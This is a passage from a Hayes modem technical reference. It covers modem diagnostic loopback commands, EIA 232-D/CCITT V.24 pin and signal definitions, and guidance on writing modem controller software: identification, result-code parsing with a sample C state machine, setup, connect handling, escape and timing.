a local analogue +loopback test will further isolate the source of the problem. An error count +of 255 indicates that 255 errors or more errors were detected. + +............................................................................ +B.4.4.3 Local Digital Loopback - &T3 +Local digital loopback tests the communication link and the remote modem. +During this test, the local modem loops incoming data directly back to the +remote modem. + +To begin local digital loopback, establish a connection with a remote modem, +then enter the command state and issue the &T3 command. + +The operator at the remote system should type in a few sentences. They will be +looped back to the remote computer. When the operator at the remote system +indicates that the test is complete, issue the &T0 command to end the test. If +the operator at the remote system reports that the data came back without +errors, the remote modem and the communication link are functioning properly. + +............................................................................ +B.4.4.4 Grant RDL Request from Remote System - &T4 +This command configures the local modem to grant a request from the remote +modem for a remote digital loopback test (factory setting). + +............................................................................ +B.4.4.5 Deny RDL Request from Remote System - &T5 +This command prohibits the local modem from granting a request from the remote +modem for a remote digital loopback test. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +B.4.5 Testing the Tone Dialer - &T2 +This command allows testing of the modem's multi-frequency tone dialer by +sending out continuous tones of the keypad characters (0-9, A-D, *, #). + +To generate any tone combination, type: + +AT X1 &T2 DT (followed by one of the keypad characters: 0-9, A-D) + +The modem will transmit a continuous tone pair until the key is pressed +or &T0 is entered to terminate the test. + + +***************************************************************************** +B.5 Testing the Cable +The cable (If used to connect the modem to the DTE, rather than through an +internal slot) is an integral part of the communication link. Even if the DTE, +serial card, and modem support all of the signals necessary for full +communications, if the cable supports only transmit and receive signals, +communication may be limited. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +B.5.1 Cable Quality +High-speed and lengthy distances between the modem and the DTE are two reasons +to make sure of characteristics like shielding that quality of the cable is +full pinning should be used according to the EIA232-D/CCITT V.24 standards +descriptions at the end of this chapter. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +B.5.2 Checking Cable Signals - &T19 +The &T19 command was created to provide a way for software to test the +capabilities of the cable between the DTE and the modem, instead of assuming +that the RTS/CTS lines (used for hardware local flow control) were supported +in a cable. This command is implemented in Hayes Smartcom Products; when +setting up the modem, one of its initial operations is issuing this command. +The command is fully documented in Chapter One. The signals tested by this +command are according to the EIA 232-D/CCITT V.24 standards described in the +next section. + + +***************************************************************************** +B.6 Testing Internal Memory +The various forms of the I command instruct the modem to query its memory for +information about itself. Although the results of these test are most +frequently used by Hayes Customer Service, some software also uses the +responses when determining how to set up the modem prior to communication. +These tests request information about the modem's firmware; therefore, it is +unnecessary to connect with a remote system before issuing the I command. The +various options for this command are explained fully in Chapter One. + + + +============================================================================== +Appendix C: +Modem-to-DTE Interface + + +This appendix discusses the requirements and capabilities of the modem's +interfaces to the DTE line. External modems interface to the DTE according to +the EIA 232-D standard. The particulars of this interface for Smartmodem 300, +Smartmodem 1200, Smartmodem 2400, Smartmodem 9600, V-series Smartmodem 2400, +and V-series Smartmodem 9600 are described. Hayes internal modems use the EIA +232-D signals, although the specific use of these circuits is determined by +the bus interface of the computer. + +***************************************************************************** +C.1 EIA 232-D/CCITT V.24 Interfaces +EIA 232-D is the EIA (Electronic Industries Association) definition of the +electrical interface used for connections of data terminal equipment (DTE) to +data circuit terminating equipment (DCE). This standard has typically been +referred to as RS 232-C; however, when it became an accepted standard (EIA) +rather than a recommended standard (RS), the Association revised the version +"D." + +Although not exactly the same, EIA 232-D is compatible with CCITT V.24, V.28, +and ISO IS2110 standards. This standard prescribes the interface to the local +DTE and normally uses a DB-25 connector with 13 pins in one row and 12 in the +other. EIA 232-D supports speeds up to 20 Kbps at a distance of 50 feet. EIA +232-D falls under layer one (physical layer) of the OSI (Open Systems +Interconnection) model. + +Hayes modems support the electrical portion of the EIA 232-D standard +completely. However, signal definition varies from modem to modem. + + +***************************************************************************** +C.2 Signals Used in the EIA 232-D Interface + +The following signal types are used in the EIA 232-D interface. All of these +types are not required for all communications. Their corresponding CCITT V.24 +equivalents are also provided. + +Ground signals are present for protection and signal reference. These signals +are present on pins 1 and 7 of the interface. (7 always needed) + +Data signals are used to transmit and receive data across the interface. The +pins used are 2 for transmit and 3 for receive. (always needed) + +Control signals are used to ensure that both the DTE and DCE are ready before +any information is transmitted. These signals are also used for flow control +during the transfer of data. Pins 4, 5, 6, 8, 20, and 22 are control signals. +(need depends on the application) + +Timing signals control the rate at which data is transmitted and received +across the interface. These signals are only used for synchronous transmission +and are located on pins 15, 17, and 24. + +The EIA 232-D signals and their CCITT equivalents are outlined below: + +Inter- CCITT Description Pin To To +change equiva- DTE DCE +circuit lent +-------------------------------------------------------------------- +AA 101 Protective Ground 1 +AB 102 Signal Ground 7 + +BA 103 Transmitted Data 2 * +BB 104 Received Data 3 * + +CA 105 Request to Send (RTS) 4 * +CB 106 Clear to Send (CTS) 5 * + +CC 107 Data Set Ready (DSR) 6 * +CD 108.2 Data Terminal Ready (DTR) 20 * +CE 125 Ring Indicator (RI) 22 * + +CF 109 RLSD (DCD) 8 * +CG 110 Signal Quality Detector 21 * + +CH 111 Data Signal Rate Detect DTE 23 * +CI 112 Data Signal Rate Detect DCE 12 * + +DA 113 Transmitter Signal Element 24 * +DB 114 Transmitter Signal Element 15 * + +DD 115 Receiver Signal Timing 17 * +SBA 118 Secondary Transmit 14 * + +SBB 119 Secondary Receive 16 * +SCA 120 Secondary RTS 19 * + +SCB 121 Secondary CTS 13 * +SCF 122 Secondary DCD 12 * + + +***************************************************************************** +C.3 EIA 232-D Signal Definitions +This section provides definitions of the signals used for modem operation. The +circuit is first defined according to EIA 232-D, then its use explained +according to the way it is used by Hayes modems. + +Protective Ground (pin 1) is connected to the equipment frame. The ground pin +is electronically bonded to the the modem case for external Smartmodem and V- +series System Products, and to the computer's housing through the particular +bus for internal modems. Hayes Personal Modem Products do not use this signal. + +Transmit Data (pin 2) is data that is transmitted from the DTE to the DCE +device. Data should not be placed on this pin unless the RTS, CTS, DSR, and +DTR signals are on. This is the circuit that carries the data from the +attached computer or terminal to the modem for transmission across the +telephone lines. + +Receive Data (pin 3) is data that is transmitted from the DCE to DTE. This +circuit carries the data from the modem to the attached computer or terminal. + +Request To Send (pin 4) requests the channel for data transmission and is +usually ignored during asynchronous operation. It is also used to control the +direction of transmission on a half-duplex link. This signal indicates whether +the attached DTE is ready to receive data. When the modem is operating +asynchronously, this signal is always on, indicating that the modem can send +at any time. The circuit functions the same way in error-control mode, unless +the RTS/CTS local flow control method has been selected. In this case, the +modem uses this signal to determine when the DTE is ready to receive data. In +synchronous, on-line operation, the modem can be configured to ignore RTS or +respond to RTS by turning on CTS after the delay specified by S26. The modem's +use of this signal is controlled by the &R command. When in command state, the +modem always ignores RTS. + +Clear To Send (pin 5) An ON condition of this signal indicates that the modem +is ready to transmit data. This signal comes high after both DSR and DCD go +high. This signal indicates whether the modem is ready to accept data, from +the attached DTE for transmission. When the modem is operating asynchronously, +this signal is always on, indicating that the modem can receive data at any +time. In error-control mode, the signal is maintained on unless RTS/CTS local +flow control has been selected. In this case, the modem uses this signal to +indicate to the DTE that the modem is ready to receive data. When operating +synchronously, but in the asynchronous command state, the modem also maintains +the CTS signal on. The modem turns CTS off immediately upon going off-hook, +and maintains CTS off until both DSR and DCD are on and the modem is fully +prepared to transmit and receive synchronous data. The modem can also be +configured to turn CTS on in response to an off-to-on transition of RTS (see +discussion of &R command). + +Data Set Ready (pin 6) An ON condition indicates that the modem is off hook +and is not in test mode. The signal normally goes high as soon as a remote +carrier is detected. This signal indicates whether the modem is connected to a +communication channel and is ready to exchange control characters to initiate +data transmission. In asynchronous or error-control mode, the modem can be +configured to maintain this signal on at all times or have it reflect the +actual state of the DSR circuit. + +Signal Ground (pin 7) establishes a common ground reference potential for all +signal circuits. + +Data Carrier Detect - RLSD (pin 8) is turned on when the modem receives a +signal from the remote modem that meets the criteria for demodulation. This +signal indicates whether the receiver section of the modem is or is not +accepting transmitted data. In asynchronous or error-control mode, the modem +can be configured to maintain this circuit on at all times, or to track the +presence of a data carrier from the remote modem. In synchronous mode, this +circuit always tracks the presence of data carrier. See the discussion of the +&C command. + +Transmitter Clock (pin 15) provides the DTE with bit timing clock in +synchronous mode of operation. This signal synchronizes the local modem +transmitter with the receiver of the remote modem receiver. The clocking for +this signal can be sourced from the local modem, the receive carrier, or the +attached computer (from pin 24). Selection is made with the &X command. +Regardless of the source of this clock, this signal is applied by the modem to +pin 15 of the RS-232 connector and is used by the DTE to time the transmission +of serial data on the TD circuit (pin 2). This signal pertains to synchronous +communications only. + +Receive Clock (pin 17) provides the DTE with receive bit timing clock in +synchronous mode of operation. This signal provides the receiver section of +the modem with timing information. The modem always derives this signal from +the receive carrier, and applies it to pin 17. This signal is used by the data +terminal to time the incoming bit stream from the local modem (RD - pin 3). +This signal pertains to synchronous communications only. + +Data Terminal Ready (pin 20) indicates to the DCE that the DTE is ready for +transmission. It may also be used for call termination. This signal prepares +and maintains the connection to a remote system. The modem can be configured +for a variety of responses to the DTR signal, as required for the +communication mode (asynchronous versus synchronous) or communication +environment (attached DTE or software). See the &D command discussion. + +Ring Indicator (pin 22) gives an indication of a ring being received on the +telephone line. This circuit carriers signal information to indicate the modem +is receiving call signals (ring/tones). The modem turns on this signal +whenever an incoming ring is detected. When the modem is configured for +AutoSync, this pin carries a signal to indicate the end of a synchronous +frame, and does not monitor incoming rings. + +Transmitter Clock (pin 24) provides the modem with transmit signal element +timing information (optional). If the DTE sources the transmit signal element +timing on this pin, the modem can be configured to use this clock signal +rather than its own internal clock. This signal pertains to synchronous +communications only. + +Alternate Rate Select (pins 12 and 23) The modem turns on this signal on +either of these pins to indicate the selection of the current line speed. + +***************************************************************************** +C.4 Modem Interface Connector +External modems typically interface to the attached computer or other DTE +through a serial port connector. The connector used on external Smartmodem +Products and V-series System Products as the modem-to-DTE interface, is a +male DB-25 connector. Personal Modem Products use an eight-pin DIN connector. +Internal modems interface according to the bus structure of the computer in +which the modem is installed. For specific information on a particular bus +structure, see the owner's manual or reference guides for that computer. + +The table below indicates the way Hayes modems with this type of connector use +the pins to carry EIA 232-D and CCITT V.24 signals. The DTE may use certain +signals differently, or may not use them at all. + + +Pin Signal Name +------------------------------------------------------------------- +1 Protective Ground - PG +2 Send Data - SD +3 Receive Data - RD +4 Request to Send - RTS +5 Clear to Send - CTS +6 Data Set Readey - DSR +7 Signal Ground - SG +8 Carrier Detect - CD +9 Reserved for Test +10 Reserved for Test +11 Unassigned +12 Secondary Carrier Detect +13 Secondary Clear to Send +14 Secondary Transmitted Data +15 Transmit Timing - TT +16 Secondary Received Data +17 Receiver Timing - RT +18 Unassigned +19 Secondary Request to Send +20 Data Termfifnal Ready - DTR +21 Signal Quality Detect +22 Ring Indicate - RI +23 Data Signal Rate Select +24 Transmit Timing TT +25 Unassigned + +The physical connector as well as the pin numbers of the end of the cable on +the DTE side will vary according to the DTE's serial port. + + + +============================================================= +Appendix D: +Modem Application Development + + +This appendix offers suggestions for developing applications software using +the AT command set. The techniques described apply to Hayes modems in general +except where specifically indicated. Although provided here, this information +is intended for experienced programmers who want assistance in modem +application development. + + +***************************************************************************** +D.1 Modem Identification +The initial concern for most communications software is modem identification. +Before the software determines the type of modem (e.g., is it a Hayes modem, a +high-speed modem, what features does it support - error-control or +compression?). If the AT command controller portion of the software will be +designed to work with a known set of modems, the controller can be much +simpler as the variables it must address are fewer as the predictable behavior +of the modems within the given feature set that will be addressed by the +software. + +Because the type of modem that will be present, certain assumptions can be +made regarding modem characteristics, such as maximum transmission rate, +support of V-series AT commands or specific commands such as L or X. If a more +general application is being designed for an environment about which +assumptions cannot be made regarding type or brand of modem that might be +used, the software's first task should be to identify the modem. + +The I0 and I4 command options make this process simple. In the initial +versions of Smartmodem 1200, I0 returned the three digit response: 120. Since +then, responses have been extended for several groups identifying modem +supporting 2400 bps, 9600 bps, and other products. The I0 response simply +indicates the speed category of the modem. + +The result of the I0 command is a three digit number which identifies the +category of modem product. Some unique I0 values can be used to identify a +unique product which has specific behaviors. 960, for example, identifies a V- +series System Product capable of 9600 bps, which has additional commands and +behaviors. + +The I4 command option was added when the V-series System Products were +introduced. This option provides a reliable means of communicating specific +features and modulation protocols to software. The responses to the I4 command +are strings delimited by and beginning with a lowercase letter and +typically followed by a hex-character bit-map. The I0 and I4 responses +currently defined are detailed in the description of the I4 command in Chapter +One. The tables show the decoding of the hex-map returned in the "a" +(Smartmodem features), and "b" (V-series features) bit-mapped strings. If I4 +is used to identify features of the modem, consider that new result strings +are periodically defined that may be returned in addition to those expected. +Fields once designated as "reserved" that held a zero may now have values +assigned. The strings themselves may also be different of lengths than +previously implemented. + +In spite of the modifications to this command necessary to maintain currency +with new modems, the I4 command is the best way for software to determine the +modem type and capability, if the guidelines below are considered: + +* I0 or I4 commands should be issued at 1200 bps. All Hayes products +(including the Smartmodem 300) respond to AT commands at 1200 bps. Most other +brands also respond at 1200 bps. You can switch to a higher transmission rate +once the modem has been identified. + +* Result codes should be parsed as strings surrounded by . The string +will begin with a lower-case letter followed by up to 39 additional +characters. + +------------------------------------------------------------------- +* After all result strings have been sent, an OK result is returned that +obeys the V and Q command settings. + +* ERROR, OK, or a three digit result in response to the I4 command should be +expected. These results may be returned by products shipped before the I4 +command was introduced, or by non-Hayes products. + +* The length of the strings may be different than anticipated If shorter than +expected, empty positions should be presumed zeros. If longer than expected, +extra characters should be ignored. + +* Some non-Hayes brand modems return unpredictable results in response to I0 +or I4 commands. One brand of modem actually responds with its configuration +when the I4 command is sent. + +An example I4 command and response is shown below: + +AT E0 V1 Q0 S0=0 I4 + +response: + +a087840C004424 +bF60410000 +cUS +m0000000001001FFFF +OK + +Note: each I4 result is surrounded by , not all responses are hex- +strings, and some responses may not be expected at all. + + +***************************************************************************** +D.2 Result Code Recognition +Hayes-compatible modems support verbose and numeric forms of result codes. +Unless echo may be a problem and will be installing the controller in a +limited-growth environment, verbose results rather than numeric results are +preferable. Numeric result codes were originally intended to make it easier +for software to control the modem, but there are two primary reasons they +should not be used: + +Software can be confused by a command echo. For example, if the following +command were sent with echo on (E1) and numeric results (V0): + +AT ... S9=20 + +The resulting data, echoed by the modem, would be followed by the numeric +result code zero, meaning OK: + +AT ... S9=200 + +Software may become confused by seeing a 0 result which is actually part +of the command echo, then another 0 which is the numeric result. A program +can become out of synchronization with the command processor in the modem. + +Turning off echo mode (E0) in the initial setup string would solve this +problem; however, do not end that command with any digits (simply E). + +Another shortcoming of numeric results is that the software must anticipate +all possible responses. This requires updating of controller software whenever +new result codes are added. For example, suppose a CONNECT 115200 result were +added with a numeric value of 31. If verbose results were used instead, and +the controller directed to interpret the number after the CONNECT result as +simply the connection speed in bits per second, no changes to the driver are +necessitated by the new result code. If, however, numeric result codes were +used, the result code 31 must be added to the table, and the controller +modified to interpret it appropriately. + +As characters are received, they should be processed through a state machine +providing the functionality of the one outlined below. This state machine +recognizes strings surrounded by characters and store the string in a +character array. are defined by the S3 and S4 registers. + +Sample State Machine + +Initialize with: state = 1 ; + +ch = +switch( state ) +{ +case 1: /*-- Scanning for leading CR --*/ + if( ch == CR ) state = 2 ; + i = 0 ; + break ; +case 2: /*-- Scanning for leading LF --*/ + if( ch == LF ) state = 3 ; + else if( ch == CR ) state = 2 ; + else state = 1 ; + break ; +case 3: /*-- Buffer result, watch for trailing CR --*/ + if( ch == CR ) state = 4 ; + else buf[ i++ ] = ch ; + if( i > LIMIT ) state = 1 ; + break ; +case 4: /*-- Scanning for trailing LF --*/ + if( ch == LF ) state = 5 ; + else if( ch == CR ) state = 2 ; + else state = 1 ; + break ; +} +if( state == 5 ) +{ + buf[ i ] = 0 ; /* Null terminate buffer */ + + state = 1 ; +} + +This state machine can be imbedded within a loop that reads all received data +one character at a time, checks for a timeout, and also checks for user abort. +Once a result is recognized, that loop can be exited or continued if +additional results are expected. + +Once a result code string is returned, it can be compared against the known +result code strings. Some strings may incorporate wild-card suffixes. For +example CONNECT followed by any numeric value indicates a successful +connection at the indicated transmission rate. Even if a result such as +CONNECT 38400 is not anticipated, if the controller has been coded for wild- +card recognition, the controller will be capable of interpreting such +responses correctly. This practice also facilitates interpretation of +connection failed messages that are preceded by NO followed by any other +character string such as DIALTONE, CARRIER, or ANSWER. + + +***************************************************************************** +D.3 Modem Preparation +Once the modem has been identified, the controller can continue to program any +registers or user-defined values into the modem necessary prior to initiating +the connection process. Typically, the setup operation is separated from the +connection processing because it is performed independently of whether the +call establishment will be in the originating or answering mode. + +Setup commands can be issued at the highest transmission rate the modem +supports as determined from the identification process or it may be fixed at a +certain value if the modem is not identified. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +D.3.1 Reset +Before issuing any other commands to the modem, it is advisable to issue a Z +or &F command to the modem before the identification or setup process. No +specific response should be anticipated. The modem may be setup to return +numeric, or no result codes. If a reset will be used, the following points +should be considered: + +* Even if a recognizable result within 2.6 seconds, the program should +continue. (Some modems do a lengthy reset process before responding with a +result; others may be in Q1 or V0 mode). + +* Following an OK result, an additional 600ms delay should be imposed. Some +modems will respond with an OK then do lengthy reset processing, in which case +they are unable to accept additional commands. + +After the modem is reset, the first setup string (e.g., verbose rather than +numeric result codes) should be issued, then the identification command. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +D.3.2 Setup +Software should generally provide some modem setup. However, the software can +be written to rely on modem configuration via a stored profile recalled on +reset, or by DIP switches set depending on the product. In this case, any +unique settings must have been setup prior to running the software, and all +the program does is send the Z command to recall the the desired profile. Even +more basically, software can assume the is in the power-up state. However, +unless the software will be used within a very predictable environment, these +assumptions may result in failures with the controller software. + +Some commands will always be overridden by the controller in order to ensure +its proper functioning. Other commands options should either default to the +factory setting, or simply act as the "transfer agent" for the commands +specified by the user. Menus and dialogs can be provided to prompt the user +for specific activities; the program can then interpret these requests and +configure the modem accordingly, as Hayes Smartcom Products do, or provide the +user opportunity to enter AT command strings. + +Commands frequently set by a modem controller: + +E0 - Turn off echo mode to avoid having command echoes pass through the result +code scanner + +Q1 - Enable result codes to ensure that commands are being processed, and to +synchronize with the modem command processor (except for synchronous +communications where result codes may cause the DTE confusion) + +V0 or V1 - Use either verbose (recommended) or numeric result codes + +S0=0 Disable auto-answer during the setup process to avoid inadvertent +disruption by an incoming call + +H0 - Ensure modem is on hook before continuing to the answer or originate step + +S12=10 Set the escape guard time to 200ms to hasten the escape for hang-up +process. Also reduces the probability of inadvertent user escapes + +S2=* Change the escape character for two reasons: To avoid inadvertent user +escapes, and to provide different escape characters for answer and originate +sides. This prevents inadvertent escaping when data is echoed + +S4=* Modify the linefeed character to make the NO CARRIER +result code more unique if you scan for it to detect carrier loss + +A typical setup sequence using these recommendations is shown below: + +AT E Q V S0=0 H S12=10 S2=28 S4=31 + +Note that where the zero suffix is used, it is omitted. Spaces are shown above +for readability, but the use of spaces between commands is not recommended. + +Once this setup command has been sent, and the OK response returned, the +controller can continue to the originate or answer processing. + +If user-programmed settings are included in additional setup strings, or the +user is permitted to enter AT setup strings, the software should anticipate +ERROR result codes. If an ERROR is returned in response to such a command, the +result does not have to be reported to the user, but the controller should not +be prevented from continuing in either case. Many times a connection can be +made even though some setting is in error or is inappropriate for the class of +modem being addressed. + + +***************************************************************************** +D.4 Connect Processing +Once the setup operation has been completed , the commands to establish the +connection can be issued. The instruction can be either to originate (using +the D command), or to answer (using the A or S0 commands). + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +D.4.1 Originating a Call +If the D command is issued with the desired phone number, several possible +result codes can be returned. The list below outlines some results to expect: + +Result Code Meaning +----------------------------------------------------------------------------- +NO CARRIER Connection failed +NO ANSWER No response to '@' dial modifier +NO DIALTONE No dial tone in X4 mode +NO ____ Connection failed for some other reason +BUSY Busy signal detected +CONNECT ____ Connection successful, change DTE speed to the indicated +baud rate. +CARRIER ____ * DCE carrier speed (information only) +PROTOCOL: ____ * V-Series protocol being used + +Ignore other responses, but continue to wait for CONNECT ___ or NO ___ +responses. + +The CARRIER and PROTOCOL results are intermediate results and precede either a +CONNECT ____ or NO ____ result. These results are only returned by V-series +modems when configured to use an error-correcting protocol. + +If you recognize any numeric value for the baud rate after the CONNECT result, +you will have a much more robust controller able to handle many situations. + +You can use the PROTOCOL result to determine if the flow control requested by +the &K command is in effect for V-Series System Products. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +D.4.2 Answering a Call +The simplest technique for answering an incoming call is to set S0 and wait +for a CONNECT ___ result. You may get several RING results, and possibly a NO +CARRIER result if the caller hangs up before connecting. These results should +not cause your controller to abort. Continue to wait for a CONNECT result +code. + +If you set S0, you may want to set it back to zero after your controller +finishes the call to prevent inadvertent answering when your software is not +running.By setting S0 to the number of rings you desire before the modem +answers, you utilize the ring detection technology already built-in to the +modem. + +You should not use the A command to answer after counting RING results because +the command may collide with another RING result from the modem and be missed. +The RING results may be generated in pairs depending on the ringing cadence of +the phone system. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +D.4.3 Using the CD Line +Monitoring the Carrier Detect (CD) line of the EIA 232-D interface is another +technique for carrier detection in answer or originate mode. This assumes that +&C1 or the corresponding DIP-switch has been set and the cable is wired +properly. Both are risky assumptions. You will have a more robust controller +if you use result code scanning rather than the EIA 232-D lines. + +If you use CD, you do not know when the modem has given up waiting for the +carrier, or why. If the line is busy, you may want to re-try the dial +operation. If there is no dial tone, the user needs to know this. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +D.4.4 Aborting a Connect Request +Once the D or S0 command has been issued, the modem goes off hook (or may be +off hook for S0) and it must be put back on hook (hangÐup) before the abort is +completed. To abort an in-progress connect command, send any character to the +modem. This will typically result in a NO CARRIER response. The result code +scanner should be called after the abort character is sent to prevent +additional commands from being sent before the controller and the modem are +again in sync. + +Smartcom products send AT to abort an in-progress connect command. This +elicits a result code regardless of whether the modem were off-hook or not. If +the modem was off-hook attempting to connect, this will abort the connect +operation and return NO CARRIER. If the modem was on-hook in command mode, +this simply returns OK. + + +***************************************************************************** +D.5 Carrier Loss Detection +You want your application to be able to detect when the carrier has been lost +so you can determine when the connection is complete. You might be unable to +put this part of the code in your controller software, since the controller is +typically running only during the connect or hang-up process. Once the +application has detected the carrier loss event, it can call the modem +controller to clean-up. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +D.5.1 Using the CD line +If you can be confident of the environment and cabling, and have access to the +EIA 232-D signal status, then monitoring the CD line is the easiest carrier +loss detection method to implement. This requires &C1 to be programmed at +setup time, or be stored in the modem as the value recalled on reset or +powerup. + +However, this is the most restrictive and risky choice. It requires a properly +wired cable and support of &C1 by the modem's command set or proper DIP-switch +settings. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +D.5.2 Scanning the Incoming Data Stream +In cases where you cannot depend on 100% Hayes compatibility or want to be +independent from the cable wiring, then scanning for the NO CARRIER result is +more reliable. It is also more complex to implement. + +Typically, at the low-level of the program all received data is retrieved +through one subroutine. This subroutine can be augmented or layered to provide +the service needed. As data passes through, the last fourteen characters are +buffered, typically in a circular buffer. If more data passes in each call, +only the last fourteen need to be copied. At a time when the processor is free +such as after 100 ms of idle time or the receive routine has returned no data +for 30 to 100 calls, then the buffer is compared against the NO +CARRIER result code. If a match is found, the carrier lost event is +triggered. + +By only checking when there is idle time, or after no data has been received +for a while, you reduce the CPU overhead and ensure that the modem is not +falsely triggered when the string is imbedded in an actual data stream. + +You can also modify the linefeed character by using S4 to a different value +such as S4=31 to make the result code sequence more unique. This action, +however, affects other result codes generated by the modem. + + +***************************************************************************** +D.6 Escape and Hang Up +When your controller has been instructed to terminate the connection, you must +put the modem back in command state and issue the hang-up (H) command. In +addition to hanging-up, you will also want to restore settings you changed to +their factory-set values, or issue an ATZ to undo the effects of your +changes. In any case, clean up is necessary even if the connection were +terminated due to loss of carrier. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +D.6.1 Escaping the Modem to Command State +To escape the modem, the controller must first delay the escape guard time +(specified by S12), then issue the escape character three times (specified by +S2). then wait for an OK result. Waiting for the result also enforces the +required guard time after the escape sequence. Once the OK result is received, +the modem has entered command state. The controller can then hang-up and +restore the modem. + +The controller software must be sure to wait the required guard time before +sending the escape characters. Your controller may have been called just after +data was transmitted and, without the delay, your characters will just be sent +without triggering the escape recognition process. It is important that the +serial transmitter be permitted to be idle for the escape guard time, plus a +few extra milliseconds to allow for error, before sending characters. + +For example, if S12=10 a delay of at least 200 milliseconds is required +before sending the escape characters. After sending the escape characters, the +OK result will be received after another 200 millisecond wait. This completes +the escape process in slightly over 400 milliseconds. If S12=50 (factory +setting) is used, one full second must pass before the characters can be sent, +then another second delay must transpire prior to the OK result. This +completes the process in slightly over two seconds. For this reason, it is +recommended that S12=10 be issued to speed up this process. + +A delay slightly longer than that stored in S12 should be used to allow for +errors in the system clock as well as in the modem clock. 100ms is an adequate +safety margin. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +D.6.2 Using DTR to Escape or Hang Up +The DTR EIA-232-D signal can be used to escape the modem to command state, or +to reset the modem depending on the &D command set or DIP-switch settings last +set. This also requires the cable to be properly wired. Unless the software +will operate in a highly-controlled environment, this technique is discouraged +over the escape process because of the requirements to make it function +properly. Leaving a call connected simply because the cable was not properly +wired can be potentially expensive. The escape sequence is reliably in all +environments if it is properly utilized. + + +***************************************************************************** +D.7 Modem Re-configuration +When the call has been completed, a "clean-up" command should be issued to +return the modem a more known configuration. For example, if verbose result +codes were selected when the modem was reset, and the controller selected +numeric result codes, on completing the session, the controller should reset +the modem to re-select verbose result codes. In the same way, if the linefeed +character were changed to suit the software or environment, the character +should be set to its former value. Any other command options that were +modified, should be restored to their factory-set values. + +The minimum the controller should do when through with the modem is issuing a +Z command option to ensure the modem is restored to its powerup state. + + +***************************************************************************** +D.8 Timing Considerations +A modem controller inherently has a sense of time. Usually all that is needed +to utilize the timing part of the controller is access to a time reference. +For example, the number of milliseconds since powerup or program launch, or a +"system tick" value can be used. + +Under DOS, the INT 1C timer tick produces an interrupt every 55 milliseconds. +An ISR can be installed on this interrupt to add 55 to a long integer every +time it is called. This will provide a millisecond counter. + +On the Macintosh, the "TickCount" function will return the number of vertical- +retrace ticks since computer power up. Each tick represents one sixtieth of a +second. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +D.8.1 Programming for Time +The time value is used to determine relative time. For example, if a loop +should be executed for only 2 seconds it could be coded as: + +timeout = TickCount() + 120 ; /* 60 tics per second = 2 seconds */ +do +{ + got_one = Check_Result( ) ; +} +while( ( ! got_one ) && ( SystemTick() < timeout ) ) ; + +This code fragment continues to call the Check_Result function until it +returns a true value, or until two seconds have elapsed. + +This technique is independent of processor speed. A faster processor may make +thousands of trips through the loop, where a slower one would only make a few +hundred. Any anticipated result code would arrive within that two-second real- +time window. + +Care should be given to considering when to start the timing loop. If an AT +command string is sent, then a loop executed, the time interval may also +include the time required to send the AT command (if data is buffered and sent +by an interrupt service routine). + +At 300 bps, where each character takes 33ms just to transmit (10/300), a 40 +character AT command would take over a second to transmit. This means a two +second loop spends more than half of its time waiting for the AT command +process to complete, leaving only a fraction of a second for the modem to +respond with the result (again at 33ms per character). + +One way to avoid this is to wait until all data has been transmitted by an ISR +before entering the result code scan loop. Alternatively, more time can be +provided for loops to process results. Another option is to measure idle time +rather then elapsed time. + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +D.8.2 When to Consider Time +The use of timing varies from command to command and operation to operation. +Some commands take longer to execute. The guidelines below can be used to +determine the best amount of time to wait. + +* For the Z command, wait two seconds for a response, then wait an additional +600 ms, whether a response were received or not. + +* For general setup commands, wait two seconds for the response. + +* For the hang-up command (H), wait up to 20 seconds for a response. V-Series +modems may take longer to hang-up if data buffered within the modem is still +waiting to be transmitted and acknowledged. This time is controlled by S38. + +* For dial commands (D or O) wait at least one minute or more. Values set for +carrier detect time, tone versus pulse dialing, commas in the phone number, +all can take additional time. + +If the software times out, the modem may, in fact, not be connected to the +computer, disconnected, or turned off. If this is the case, enforce a +reasonable timeout to the first setup or identification command. That will +determine whether a modem is attached and functioning. + +A timeout may also occur when the software receives a result code it does not +recognize. The software may continue to wait until it receives a code it does +recognize. If this is the case, the controller should proceed as if an ERROR +response were received. The only instance in which it is not prudent to +continue is when a connect (D, A, or S0) command was issued. + +Before implementing a timeout, the advantages, if any, to this level of +program interruption should be considered. For example, if the program times +out from a dial command in one minute when it may take two minutes to complete +the call, the timeout defeats the purpose of the command. The modem always +responds with a result code, whether BUSY, NO CARRIER, or CONNECT, after some +length of time. + +Idle time is the time since data was received. Elapsed time is the time since +the software started looking for the result. Idle time can be measured by +resetting the timeout clock each time the software receives a character. +Rather than exiting the loop after two seconds of elapsed time, the logic +changes to exit after no further data has been received for two seconds. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +D.8.3 Recovering when "Out Of Sync" +Another disadvantage of timing out is that an early time out can put the +software out of sync with the modem command processor. The controller may be +interpreting results sent in response to previous commands as the response to +later commands. To avoid this condition, any pending receive data should be +flushed before the next command is issued. + + +D.9 General Tips and Techniques +The following are tips and techniques that may help in the exchange of +information between the software controller and the modem command processor. + +Commands in the command line should be ordered starting with the safest and +ending with the most risky. Risk is defined as the potential to generate an +ERROR, causing the remainder of the command line to be ignored. + +Any command that may return ERROR should be anticipated. This or other +unexpected results can be ignored unless the command is critical +(configuration or call placement). + +Send I0 or I4 at 1200 bps, which is supported by the majority of modem +products. A modem reset (&F or Z) should be performed at 1200 bps before +sending the identification commands. + +Setup processing can be speeded by sending all but the last D or S0 command at +the highest DTE rate supported by the modem. The last command must be sent at +the speed at which the connection should be made (except V-Series 